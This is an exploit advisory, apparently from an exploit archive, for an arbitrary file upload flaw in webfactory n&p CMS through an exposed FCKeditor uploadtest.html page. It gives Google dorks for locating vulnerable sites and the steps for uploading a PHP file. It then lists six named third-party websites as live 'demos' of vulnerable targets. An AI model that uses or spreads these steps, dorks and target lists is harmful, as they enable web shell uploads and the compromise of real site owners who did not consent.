[+] webfactory n&p CMS (fckeditor) Arbitrary File Upload Vulnerability
[+] Exploit Title : webfactory n&p CMS (FCKEDITOR)
[+] Exploit Author : Ashiyane Digital Security Team
[+] Vendor Homepage : http://www.n-p.at
[+] Google Dork 1 : inurl:pcms/content
[+] Google Dork 2 : by webfactory n&p
[+] Date: 2015/05/11
[+] Tested On : Windows 7 / Mozilla Firefox
[+] Version : All Version


[+] exploit => /admin/fckeditor/editor/filemanager/connectors/uploadtest.html

[+] first go to => http://site.com/[path]

[+] then =>
http://www.site.com/[path]/admin/fckeditor/editor/filemanager/connectors/uploadtest.html

[+] select => Select the "File Uploader"> php ... upload to : Uploaded
File URL:

[+] demos :

[+]
http://tirol-kaiserwinkl.at/admin/fckeditor/editor/filemanager/connectors/uploadtest.html

[+]
http://ruetz-sport.at/admin/fckeditor/editor/filemanager/connectors/uploadtest.html

[+]
http://berauergmbh.at/admin/fckeditor/editor/filemanager/connectors/uploadtest.html

[+]
http://creativceramic.at/admin/fckeditor/editor/filemanager/connectors/uploadtest.html

[+]
http://hauskofler.at/admin/fckeditor/editor/filemanager/connectors/uploadtest.html

[+]
http://romantica-geiger.at/admin/fckeditor/editor/filemanager/connectors/uploadtest.html

[+][+][+][+][+][+][+][+][+][+][+]
[+]Discovered By : Cyb3r_Dr4in[+]
[+][+][+][+][+][+][+][+][+][+][+]